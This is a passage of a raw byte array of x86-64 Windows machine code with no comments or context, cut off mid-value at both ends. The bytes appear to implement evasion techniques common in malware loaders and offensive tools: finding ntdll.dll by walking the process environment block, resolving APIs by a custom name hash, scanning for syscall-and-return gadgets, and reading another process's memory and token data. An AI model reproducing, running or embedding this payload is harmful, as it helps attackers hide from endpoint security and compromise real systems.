3,0x7D,0xF8,0x00,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x42,0x48,0x8B,0x45,0xE8,0x48,0x8D,0x15,0x9B,0x85,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0xED,0xF3,0x00,0x00,0xFF,0xD0,0x85,0xC0,0x0F,0x94,0xC0,0x0F,0xB6,0xD0,0x48,0x8B,0x45,0x10,0x89,0x10,0x48,0x8B,0x45,0xE8,0x48,0x89,0xC1,0x48,0x8B,0x05,0x6F,0xF3,0x00,0x00,0xFF,0xD0,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0xB8,0x01,0x00,0x00,0x00,0x48,0x83,0xC4,0x40,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x50,0x48,0x89,0x4D,0x10,0x48,0x89,0x55,0x18,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xD8,0x00,0x00,0x00,0x00,0xBA,0x01,0x00,0x00,0x00,0x48,0x8D,0x05,0xD5,0x84,0x00,0x00,0x48,0x89,0xC1,0xE8,0x9C,0xD6,0xFF,0xFF,0x41,0xB8,0x00,0x00,0x00,0x00,0xBA,0x4F,0xB3,0x89,0x2E,0x48,0x89,0xC1,0xE8,0xAA,0xD4,0xFF,0xFF,0x48,0x89,0x45,0xF0,0x48,0x83,0x7D,0xF0,0x00,0x74,0x57,0x48,0x8D,0x55,0xE0,0x48,0x8B,0x45,0x10,0x4C,0x8B,0x45,0xF0,0x48,0x89,0xC1,0x41,0xFF,0xD0,0x89,0x45,0xEC,0x83,0x7D,0xEC,0x00,0x74,0x3F,0x48,0x8D,0x55,0xD8,0x48,0x8B,0x45,0x18,0x4C,0x8B,0x45,0xF0,0x48,0x89,0xC1,0x41,0xFF,0xD0,0x89,0x45,0xEC,0x83,0x7D,0xEC,0x00,0x74,0x27,0x48,0x8B,0x55,0xD8,0x48,0x8B,0x45,0xE0,0x48,0x89,0xC1,0x48,0x8B,0x05,0x19,0xF3,0x00,0x00,0xFF,0xD0,0x85,0xC0,0x0F,0x94,0xC0,0x0F,0xB6,0xC0,0x89,0x45,0xFC,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x48,0x8B,0x45,0xE0,0x48,0x85,0xC0,0x74,0x10,0x48,0x8B,0x45,0xE0,0x48,0x89,0xC1,0x48,0x8B,0x05,0x8C,0xF2,0x00,0x00,0xFF,0xD0,0x48,0x8B,0x45,0xD8,0x48,0x85,0xC0,0x74,0x10,0x48,0x8B,0x45,0xD8,0x48,0x89,0xC1,0x48,0x8B,0x05,0x73,0xF2,0x00,0x00,0xFF,0xD0,0x8B,0x45,0xFC,0x48,0x83,0xC4,0x50,0x5D,0xC3,0x55,0x53,0x48,0x83,0xEC,0x58,0x48,0x8D,0x6C,0x24,0x50,0x48,0x89,0x4D,0x20,0x48,0x89,0x55,0x28,0xC7,0x45,0xEC,0x08,0x00,0x00,0x00,0x8B,0x45,0xEC,0x89,0x45,0xF4,0x48,0xC7,0x45,0xF8,0x00,0x00,0x00,0x00,0x8B,0x45,0xEC,0x89,0x45,0xF4,0x8B,0x45,0xEC,0x89,0xC3,0x48,0x8B,0x05,0xFE,0xF1,0x00,0x00,0xFF,0xD0,0x49,0x89,0xD8,0xBA,0x08,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0xF2,0xF1,0x00,0x00,0xFF,0xD0,0x48,0x89,0x45,0xF8,0x48,0x83,0x7D,0xF8,0x00,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0xF7,0x00,0x00,0x00,0x44,0x8B,0x45,0xEC,0x48,0x8B,0x4D,0xF8,0x48,0x8B,0x45,0x20,0x48,0x8D,0x55,0xEC,0x48,0x89,0x54,0x24,0x20,0x45,0x89,0xC1,0x49,0x89,0xC8,0xBA,0x0B,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x5C,0x16,0x00,0x00,0x89,0x45,0xF0,0x83,0x7D,0xF0,0x00,0x79,0x56,0x48,0x83,0x7D,0xF8,0x00,0x74,0x40,0x8B,0x55,0xF4,0x48,0x8B,0x45,0xF8,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x0C,0x60,0x00,0x00,0x48,0x8B,0x05,0x7D,0xF1,0x00,0x00,0xFF,0xD0,0x48,0x8B,0x55,0xF8,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x75,0xF1,0x00,0x00,0xFF,0xD0,0x48,0xC7,0x45,0xF8,0x00,0x00,0x00,0x00,0x81,0x7D,0xF0,0x23,0x00,0x00,0xC0,0x0F,0x84,0x3E,0xFF,0xFF,0xFF,0xEB,0x01,0x90,0x83,0x7D,0xF0,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x62,0x48,0x8B,0x45,0xF8,0x8B,0x00,0x85,0xC0,0x0F,0x94,0xC0,0x0F,0xB6,0xD0,0x48,0x8B,0x45,0x28,0x89,0x10,0x48,0x83,0x7D,0xF8,0x00,0x74,0x42,0x8B,0x45,0xEC,0x89,0xC2,0x48,0x8B,0x45,0xF8,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x92,0x5F,0x00,0x00,0x48,0x8B,0x05,0x03,0xF1,0x00,0x00,0xFF,0xD0,0x48,0x8B,0x55,0xF8,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0xFB,0xF0,0x00,0x00,0xFF,0xD0,0x48,0xC7,0x45,0xF8,0x00,0x00,0x00,0x00,0xB8,0x01,0x00,0x00,0x00,0x48,0x83,0xC4,0x58,0x5B,0x5D,0xC3,0x55,0x57,0x53,0x48,0x81,0xEC,0x70,0x04,0x00,0x00,0x48,0x8D,0xAC,0x24,0x80,0x00,0x00,0x00,0x48,0x89,0x8D,0x10,0x04,0x00,0x00,0x48,0x89,0x95,0x18,0x04,0x00,0x00,0xC7,0x85,0xEC,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0xD0,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC7,0x85,0xE8,0x03,0x00,0x00,0x00,0x01,0x00,0x00,0x48,0x8D,0x95,0xD0,0x01,0x00,0x00,0xB8,0x00,0x00,0x00,0x00,0xB9,0x40,0x00,0x00,0x00,0x48,0x89,0xD7,0xF3,0x48,0xAB,0x48,0x8D,0x55,0xD0,0xB8,0x00,0x00,0x00,0x00,0xB9,0x40,0x00,0x00,0x00,0x48,0x89,0xD7,0xF3,0x48,0xAB,0x8B,0x85,0xE8,0x03,0x00,0x00,0x89,0x45,0xCC,0x8B,0x85,0xE8,0x03,0x00,0x00,0x89,0x45,0xC8,0xBA,0x01,0x00,0x00,0x00,0x48,0x8D,0x05,0x2B,0x82,0x00,0x00,0x48,0x89,0xC1,0xE8,0xF2,0xD3,0xFF,0xFF,0x41,0xB8,0x00,0x00,0x00,0x00,0xBA,0x2B,0x75,0x3E,0x09,0x48,0x89,0xC1,0xE8,0x00,0xD2,0xFF,0xFF,0x48,0x89,0x85,0xE0,0x03,0x00,0x00,0x48,0x83,0xBD,0xE0,0x03,0x00,0x00,0x00,0x0F,0x84,0x50,0x01,0x00,0x00,0x48,0x8D,0x95,0xD0,0x03,0x00,0x00,0x48,0x8B,0x85,0x10,0x04,0x00,0x00,0x48,0x89,0xC1,0xE8,0x40,0xF9,0xFF,0xFF,0x89,0x85,0xDC,0x03,0x00,0x00,0x83,0xBD,0xDC,0x03,0x00,0x00,0x00,0x0F,0x84,0x2A,0x01,0x00,0x00,0x48,0x8B,0x85,0xD0,0x03,0x00,0x00,0x4C,0x8D,0x45,0xCC,0x48,0x8D,0x8D,0xD0,0x01,0x00,0x00,0x48,0x8D,0x55,0xC4,0x48,0x89,0x54,0x24,0x30,0x48,0x8D,0x55,0xC8,0x48,0x89,0x54,0x24,0x28,0x48,0x8D,0x55,0xD0,0x48,0x89,0x54,0x24,0x20,0x4C,0x8B,0x95,0xE0,0x03,0x00,0x00,0x4D,0x89,0xC1,0x49,0x89,0xC8,0x48,0x89,0xC2,0xB9,0x00,0x00,0x00,0x00,0x41,0xFF,0xD2,0x89,0x85,0xDC,0x03,0x00,0x00,0x83,0xBD,0xDC,0x03,0x00,0x00,0x00,0x0F,0x84,0xD5,0x00,0x00,0x00,0x8B,0x85,0xE8,0x03,0x00,0x00,0x01,0xC0,0x83,0xC0,0x01,0x89,0xC0,0x48,0x8D,0x1C,0x00,0x48,0x8B,0x05,0x84,0xEF,0x00,0x00,0xFF,0xD0,0x49,0x89,0xD8,0xBA,0x08,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x78,0xEF,0x00,0x00,0xFF,0xD0,0x48,0x8B,0x95,0x18,0x04,0x00,0x00,0x48,0x89,0x02,0x48,0x8B,0x85,0x18,0x04,0x00,0x00,0x48,0x8B,0x00,0x48,0x85,0xC0,0x0F,0x84,0x8D,0x00,0x00,0x00,0x8B,0x85,0xE8,0x03,0x00,0x00,0x01,0xC0,0x83,0xC0,0x01,0x89,0xC1,0x48,0x8B,0x85,0x18,0x04,0x00,0x00,0x48,0x8B,0x00,0x48,0x8D,0x55,0xD0,0x49,0x89,0xC8,0x48,0x89,0xC1,0xE8,0x1B,0x5E,0x00,0x00,0x8B,0x85,0xE8,0x03,0x00,0x00,0x01,0xC0,0x83,0xC0,0x01,0x89,0xC2,0x48,0x8B,0x85,0x18,0x04,0x00,0x00,0x48,0x8B,0x00,0x49,0x89,0xD0,0x48,0x8D,0x15,0x62,0x81,0x00,0x00,0x48,0x89,0xC1,0xE8,0xEA,0x5D,0x00,0x00,0x8B,0x85,0xE8,0x03,0x00,0x00,0x01,0xC0,0x83,0xC0,0x01,0x89,0xC1,0x48,0x8B,0x85,0x18,0x04,0x00,0x00,0x48,0x8B,0x00,0x48,0x8D,0x95,0xD0,0x01,0x00,0x00,0x49,0x89,0xC8,0x48,0x89,0xC1,0xE8,0xC1,0x5D,0x00,0x00,0xC7,0x85,0xEC,0x03,0x00,0x00,0x01,0x00,0x00,0x00,0xEB,0x0A,0x90,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x48,0x8B,0x85,0xD0,0x03,0x00,0x00,0x48,0x85,0xC0,0x74,0x13,0x48,0x8B,0x85,0xD0,0x03,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0xD6,0xEE,0x00,0x00,0xFF,0xD0,0x8B,0x85,0xEC,0x03,0x00,0x00,0x48,0x81,0xC4,0x70,0x04,0x00,0x00,0x5B,0x5F,0x5D,0xC3,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x70,0x48,0x89,0x4D,0x10,0x66,0x0F,0xEF,0xC0,0x0F,0x11,0x45,0xC0,0x0F,0x11,0x45,0xD0,0x0F,0x11,0x45,0xE0,0x48,0xC7,0x45,0xC8,0x00,0x00,0x00,0x00,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0x48,0x8D,0x4D,0xC0,0x8B,0x55,0xFC,0x48,0x8B,0x45,0x10,0x48,0xC7,0x44,0x24,0x20,0x00,0x00,0x00,0x00,0x41,0xB9,0x30,0x00,0x00,0x00,0x49,0x89,0xC8,0x48,0x89,0xC1,0xE8,0xC7,0x0D,0x00,0x00,0x89,0x45,0xF8,0x83,0x7D,0xF8,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x04,0x48,0x8B,0x45,0xC8,0x48,0x83,0xC4,0x70,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x60,0x48,0x89,0x4D,0x10,0x89,0x55,0x18,0x48,0x8B,0x45,0x10,0x48,0x89,0xC1,0xE8,0x7B,0xFF,0xFF,0xFF,0x48,0x89,0x45,0xF8,0x48,0x83,0x7D,0xF8,0x00,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0xB1,0x00,0x00,0x00,0x48,0x8B,0x45,0xF8,0x48,0x83,0xC0,0x18,0x48,0x89,0x45,0xF0,0x48,0xC7,0x45,0xD8,0x00,0x00,0x00,0x00,0x48,0x8D,0x4D,0xD8,0x48,0x8B,0x55,0xF0,0x48,0x8B,0x45,0x10,0x48,0xC7,0x44,0x24,0x20,0x00,0x00,0x00,0x00,0x41,0xB9,0x08,0x00,0x00,0x00,0x49,0x89,0xC8,0x48,0x89,0xC1,0xE8,0x3B,0x0C,0x00,0x00,0x89,0x45,0xEC,0x83,0x7D,0xEC,0x00,0x79,0x0D,0x83,0x7D,0x18,0x00,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x61,0x83,0x7D,0xEC,0x00,0x79,0x0D,0x83,0x7D,0x18,0x00,0x74,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x4E,0x48,0x8B,0x45,0xD8,0x48,0x83,0xC0,0x10,0x48,0x89,0x45,0xE0,0x48,0xC7,0x45,0xD0,0x00,0x00,0x00,0x00,0x48,0x8D,0x4D,0xD0,0x48,0x8B,0x55,0xE0,0x48,0x8B,0x45,0x10,0x48,0xC7,0x44,0x24,0x20,0x00,0x00,0x00,0x00,0x41,0xB9,0x08,0x00,0x00,0x00,0x49,0x89,0xC8,0x48,0x89,0xC1,0xE8,0xD8,0x0B,0x00,0x00,0x89,0x45,0xEC,0x83,0x7D,0xEC,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x04,0x48,0x8B,0x45,0xD0,0x48,0x83,0xC4,0x60,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x40,0x48,0x89,0x4D,0x10,0x48,0x89,0x55,0x18,0x48,0x8B,0x05,0x20,0xED,0x00,0x00,0xFF,0xD0,0x41,0xB8,0x20,0x02,0x00,0x00,0xBA,0x08,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x11,0xED,0x00,0x00,0xFF,0xD0,0x48,0x89,0x45,0xF8,0x48,0x83,0x7D,0xF8,0x00,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0xAC,0x00,0x00,0x00,0x48,0x8B,0x45,0xF8,0x48,0xC7,0x00,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0x18,0x48,0x8B,0x40,0x30,0x48,0x89,0xC2,0x48,0x8B,0x45,0xF8,0x48,0x89,0x50,0x08,0x48,0x8B,0x45,0x18,0x8B,0x50,0x40,0x48,0x8B,0x45,0xF8,0x89,0x50,0x10,0x48,0x8B,0x45,0x18,0x8B,0x90,0x80,0x00,0x00,0x00,0x48,0x8B,0x45,0xF8,0x89,0x90,0x18,0x02,0x00,0x00,0x48,0x8B,0x45,0x18,0x8B,0x90,0x20,0x01,0x00,0x00,0x48,0x8B,0x45,0xF8,0x89,0x90,0x1C,0x02,0x00,0x00,0x48,0x8B,0x45,0x18,0x0F,0xB7,0x40,0x48,0xBA,0x00,0x02,0x00,0x00,0x66,0x39,0xD0,0x0F,0x47,0xC2,0x0F,0xB7,0xC0,0x89,0x45,0xF4,0x8B,0x4D,0xF4,0x48,0x8B,0x45,0xF8,0x4C,0x8D,0x40,0x14,0x48,0x8B,0x45,0x18,0x48,0x8B,0x50,0x50,0x48,0x8B,0x45,0x10,0x48,0xC7,0x44,0x24,0x20,0x00,0x00,0x00,0x00,0x49,0x89,0xC9,0x48,0x89,0xC1,0xE8,0xE1,0x0A,0x00,0x00,0x89,0x45,0xF0,0x83,0x7D,0xF0,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x04,0x48,0x8B,0x45,0xF8,0x48,0x83,0xC4,0x40,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x40,0x48,0x89,0x4D,0x10,0x48,0x89,0x55,0x18,0x4C,0x89,0x45,0x20,0x4C,0x89,0x4D,0x28,0x48,0x8B,0x4D,0x20,0x48,0x8B,0x55,0x18,0x48,0x8B,0x45,0x10,0x48,0xC7,0x44,0x24,0x20,0x00,0x00,0x00,0x00,0x41,0xB9,0x28,0x01,0x00,0x00,0x49,0x89,0xC8,0x48,0x89,0xC1,0xE8,0x89,0x0A,0x00,0x00,0x89,0x45,0xFC,0x83,0x7D,0xFC,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x5F,0x48,0x8B,0x45,0x28,0x41,0xB8,0x04,0x01,0x00,0x00,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x63,0x5A,0x00,0x00,0x48,0x8B,0x45,0x20,0x0F,0xB7,0x40,0x58,0x44,0x0F,0xB7,0xC0,0x48,0x8B,0x45,0x20,0x48,0x8B,0x50,0x60,0x48,0x8B,0x4D,0x28,0x48,0x8B,0x45,0x10,0x48,0xC7,0x44,0x24,0x20,0x00,0x00,0x00,0x00,0x4D,0x89,0xC1,0x49,0x89,0xC8,0x48,0x89,0xC1,0xE8,0x2F,0x0A,0x00,0x00,0x89,0x45,0xFC,0x83,0x7D,0xFC,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x05,0xB8,0x01,0x00,0x00,0x00,0x48,0x83,0xC4,0x40,0x5D,0xC3,0x55,0x48,0x81,0xEC,0xA0,0x03,0x00,0x00,0x48,0x8D,0xAC,0x24,0x80,0x00,0x00,0x00,0x48,0x89,0x8D,0x30,0x03,0x00,0x00,0x48,0x89,0x95,0x38,0x03,0x00,0x00,0x44,0x89,0x85,0x40,0x03,0x00,0x00,0x44,0x89,0x8D,0x48,0x03,0x00,0x00,0x48,0xC7,0x85,0x18,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x8B,0x95,0x48,0x03,0x00,0x00,0x48,0x8B,0x85,0x30,0x03,0x00,0x00,0x48,0x89,0xC1,0xE8,0x23,0xFD,0xFF,0xFF,0x48,0x89,0x85,0x10,0x03,0x00,0x00,0x48,0x83,0xBD,0x10,0x03,0x00,0x00,0x00,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0x09,0x02,0x00,0x00,0x48,0xC7,0x85,0x08,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x66,0xC7,0x85,0x06,0x03,0x00,0x00,0x00,0x00,0xC7,0x85,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xE9,0xB0,0x01,0x00,0x00,0x4C,0x8D,0x45,0xA0,0x48,0x8D,0x8D,0xB0,0x01,0x00,0x00,0x48,0x8B,0x95,0x10,0x03,0x00,0x00,0x48,0x8B,0x85,0x30,0x03,0x00,0x00,0x4D,0x89,0xC1,0x49,0x89,0xC8,0x48,0x89,0xC1,0xE8,0x9C,0xFE,0xFF,0xFF,0x89,0x85,0xEC,0x02,0x00,0x00,0x83,0xBD,0xEC,0x02,0x00,0x00,0x00,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0xA6,0x01,0x00,0x00,0x48,0x83,0xBD,0x08,0x03,0x00,0x00,0x00,0x75,0x0E,0x48,0x8B,0x85,0xB8,0x01,0x00,0x00,0x48,0x89,0x85,0x08,0x03,0x00,0x00,0xC7,0x85,0xFC,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0xE9,0x19,0x01,0x00,0x00,0x8B,0x85,0xFC,0x02,0x00,0x00,0x48,0x98,0x48,0x8D,0x14,0xC5,0x00,0x00,0x00,0x00,0x48,0x8B,0x85,0x38,0x03,0x00,0x00,0x48,0x01,0xD0,0x48,0x8B,0x00,0x48,0x8D,0x55,0xA0,0x48,0x89,0xC1,0x48,0x8B,0x05,0x01,0xEB,0x00,0x00,0xFF,0xD0,0x85,0xC0,0x0F,0x85,0xDD,0x00,0x00,0x00,0x8B,0x85,0xFC,0x02,0x00,0x00,0x48,0x98,0x48,0x8D,0x14,0xC5,0x00,0x00,0x00,0x00,0x48,0x8B,0x85,0x38,0x03,0x00,0x00,0x48,0x01,0xD0,0x48,0x8B,0x00,0x48,0x8D,0x15,0xAB,0x7C,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0xC9,0xEA,0x00,0x00,0xFF,0xD0,0x85,0xC0,0x75,0x0A,0xC7,0x85,0x00,0x03,0x00,0x00,0x01,0x00,0x00,0x00,0x48,0x8D,0x95,0xB0,0x01,0x00,0x00,0x48,0x8B,0x85,0x30,0x03,0x00,0x00,0x48,0x89,0xC1,0xE8,0xDC,0xFC,0xFF,0xFF,0x48,0x89,0x85,0xE0,0x02,0x00,0x00,0x48,0x83,0xBD,0xE0,0x02,0x00,0x00,0x00,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0xDB,0x00,0x00,0x00,0x48,0x83,0xBD,0x18,0x03,0x00,0x00,0x00,0x75,0x10,0x48,0x8B,0x85,0xE0,0x02,0x00,0x00,0x48,0x89,0x85,0x18,0x03,0x00,0x00,0xEB,0x41,0x48,0x8B,0x85,0x18,0x03,0x00,0x00,0x48,0x89,0x85,0xF0,0x02,0x00,0x00,0xEB,0x11,0x48,0x8B,0x85,0xF0,0x02,0x00,0x00,0x48,0x8B,0x00,0x48,0x89,0x85,0xF0,0x02,0x00,0x00,0x48,0x8B,0x85,0xF0,0x02,0x00,0x00,0x48,0x8B,0x00,0x48,0x85,0xC0,0x75,0xE0,0x48,0x8B,0x85,0xF0,0x02,0x00,0x00,0x48,0x8B,0x95,0xE0,0x02,0x00,0x00,0x48,0x89,0x10,0x0F,0xB7,0x85,0x06,0x03,0x00,0x00,0x83,0xC0,0x01,0x66,0x89,0x85,0x06,0x03,0x00,0x00,0xEB,0x19,0x83,0x85,0xFC,0x02,0x00,0x00,0x01,0x8B,0x85,0xFC,0x02,0x00,0x00,0x3B,0x85,0x40,0x03,0x00,0x00,0x0F,0x8C,0xD5,0xFE,0xFF,0xFF,0x48,0x8B,0x85,0xB0,0x01,0x00,0x00,0x48,0x89,0x85,0x10,0x03,0x00,0x00,0x48,0x8B,0x85,0x10,0x03,0x00,0x00,0x48,0x3B,0x85,0x08,0x03,0x00,0x00,0x74,0x15,0x0F,0xBF,0x85,0x06,0x03,0x00,0x00,0x39,0x85,0x40,0x03,0x00,0x00,0x0F,0x8F,0x3D,0xFE,0xFF,0xFF,0xEB,0x01,0x90,0x83,0xBD,0x48,0x03,0x00,0x00,0x00,0x74,0x10,0x83,0xBD,0x00,0x03,0x00,0x00,0x00,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x07,0x48,0x8B,0x85,0x18,0x03,0x00,0x00,0x48,0x81,0xC4,0xA0,0x03,0x00,0x00,0x5D,0xC3,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0xB8,0xAD,0xDE,0xDE,0xC0,0xC3,0x90,0x0F,0x0B,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x20,0xB9,0x0F,0x2A,0x9B,0xCD,0xE8,0x3F,0x06,0x00,0x00,0x48,0x83,0xC4,0x20,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x40,0x48,0x89,0x4D,0x10,0x89,0x55,0x18,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0x66,0xC7,0x45,0xE1,0x0F,0x05,0xC6,0x45,0xE3,0xC3,0x8B,0x45,0x18,0x83,0xE8,0x02,0x89,0x45,0xE4,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0xEB,0x35,0x8B,0x55,0xFC,0x48,0x8B,0x45,0x10,0x48,0x01,0xD0,0x48,0x89,0x45,0xE8,0x48,0x8B,0x55,0xE8,0x48,0x8D,0x45,0xE1,0x41,0xB8,0x03,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x08,0x57,0x00,0x00,0x85,0xC0,0x75,0x09,0x48,0x8B,0x45,0xE8,0xE9,0xD1,0x00,0x00,0x00,0x83,0x45,0xFC,0x01,0x8B,0x45,0xFC,0x3B,0x45,0xE4,0x72,0xC3,0xC7,0x45,0xF8,0x01,0x00,0x00,0x00,0xE9,0xA5,0x00,0x00,0x00,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xEB,0x3E,0x8B,0x55,0xF4,0x48,0x8B,0x45,0x10,0x48,0x01,0xC2,0x8B,0x45,0xF8,0x0F,0xAF,0x45,0x18,0x89,0xC0,0x48,0x01,0xD0,0x48,0x89,0x45,0xE8,0x48,0x8B,0x55,0xE8,0x48,0x8D,0x45,0xE1,0x41,0xB8,0x03,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xAA,0x56,0x00,0x00,0x85,0xC0,0x75,0x06,0x48,0x8B,0x45,0xE8,0xEB,0x76,0x83,0x45,0xF4,0x01,0x8B,0x45,0xF4,0x3B,0x45,0xE4,0x72,0xBA,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xEB,0x41,0x8B,0x55,0xF0,0x48,0x8B,0x45,0x10,0x48,0x01,0xC2,0x8B,0x45,0xF8,0x0F,0xAF,0x45,0x18,0x89,0xC1,0x48,0x89,0xD0,0x48,0x29,0xC8,0x48,0x89,0x45,0xE8,0x48,0x8B,0x55,0xE8,0x48,0x8D,0x45,0xE1,0x41,0xB8,0x03,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x58,0x56,0x00,0x00,0x85,0xC0,0x75,0x06,0x48,0x8B,0x45,0xE8,0xEB,0x24,0x83,0x45,0xF0,0x01,0x8B,0x45,0xF0,0x3B,0x45,0xE4,0x72,0xB7,0x83,0x45,0xF8,0x01,0x81,0x7D,0xF8,0x25,0x02,0x00,0x00,0x0F,0x86,0x4E,0xFF,0xFF,0xFF,0x48,0x8D,0x05,0xAA,0xFE,0xFF,0xFF,0x48,0x83,0xC4,0x40,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x10,0x48,0x89,0x4D,0x10,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0xC7,0x45,0xF8,0xDE,0xC0,0x37,0x13,0xEB,0x28,0x8B,0x45,0xFC,0x8D,0x50,0x01,0x89,0x55,0xFC,0x89,0xC2,0x48,0x8B,0x45,0x10,0x48,0x01,0xD0,0x0F,0xB7,0x00,0x66,0x89,0x45,0xF6,0x0F,0xB7,0x45,0xF6,0x8B,0x55,0xF8,0xC1,0xCA,0x08,0x01,0xD0,0x31,0x45,0xF8,0x8B,0x55,0xFC,0x48,0x8B,0x45,0x10,0x48,0x01,0xD0,0x0F,0xB6,0x00,0x84,0xC0,0x75,0xC7,0x8B,0x45,0xF8,0x48,0x83,0xC4,0x10,0x5D,0xC3,0x55,0x53,0x48,0x81,0xEC,0xE8,0x00,0x00,0x00,0x48,0x8D,0xAC,0x24,0xE0,0x00,0x00,0x00,0x8B,0x05,0x8F,0xA5,0x00,0x00,0x85,0xC0,0x74,0x0A,0xB8,0x01,0x00,0x00,0x00,0xE9,0x15,0x04,0x00,0x00,0xC7,0x85,0x64,0xFF,0xFF,0xFF,0x60,0x00,0x00,0x00,0x8B,0x85,0x64,0xFF,0xFF,0xFF,0x65,0x48,0x8B,0x00,0x48,0x89,0x85,0x58,0xFF,0xFF,0xFF,0x48,0x8B,0x85,0x58,0xFF,0xFF,0xFF,0x48,0x89,0x45,0xD0,0x48,0x8B,0x45,0xD0,0x48,0x8B,0x40,0x18,0x48,0x89,0x45,0xC8,0x48,0xC7,0x45,0xF8,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0xC8,0x48,0x8B,0x40,0x10,0x48,0x89,0x45,0xE8,0xE9,0xA1,0x00,0x00,0x00,0x48,0x8B,0x45,0xE8,0x48,0x8B,0x40,0x30,0x48,0x89,0x45,0xF0,0x48,0x8B,0x45,0xF0,0x48,0x89,0x45,0xC0,0x48,0x8B,0x45,0xC0,0x8B,0x40,0x3C,0x48,0x63,0xD0,0x48,0x8B,0x45,0xF0,0x48,0x01,0xD0,0x48,0x89,0x45,0xB8,0x48,0x8B,0x45,0xB8,0x48,0x05,0x88,0x00,0x00,0x00,0x48,0x89,0x45,0xB0,0x48,0x8B,0x45,0xB0,0x8B,0x00,0x89,0x45,0xAC,0x83,0x7D,0xAC,0x00,0x74,0x4C,0x8B,0x55,0xAC,0x48,0x8B,0x45,0xF0,0x48,0x01,0xD0,0x48,0x89,0x45,0xF8,0x48,0x8B,0x45,0xF8,0x8B,0x40,0x0C,0x89,0xC2,0x48,0x8B,0x45,0xF0,0x48,0x01,0xD0,0x48,0x89,0x45,0xA0,0x48,0x8B,0x45,0xA0,0x8B,0x00,0x0D,0x20,0x20,0x20,0x20,0x3D,0x6E,0x74,0x64,0x6C,0x75,0x1B,0x48,0x8B,0x45,0xA0,0x48,0x83,0xC0,0x04,0x8B,0x00,0x0D,0x20,0x20,0x20,0x20,0x3D,0x6C,0x2E,0x64,0x6C,0x74,0x24,0xEB,0x04,0x90,0xEB,0x01,0x90,0x48,0x8B,0x45,0xE8,0x48,0x8B,0x00,0x48,0x89,0x45,0xE8,0x48,0x8B,0x45,0xE8,0x48,0x8B,0x40,0x30,0x48,0x85,0xC0,0x0F,0x85,0x4E,0xFF,0xFF,0xFF,0xEB,0x01,0x90,0x48,0x83,0x7D,0xF8,0x00,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0xFC,0x02,0x00,0x00,0x48,0x8B,0x45,0xF8,0x8B,0x40,0x18,0x89,0x45,0xE4,0x48,0x8B,0x45,0xF8,0x8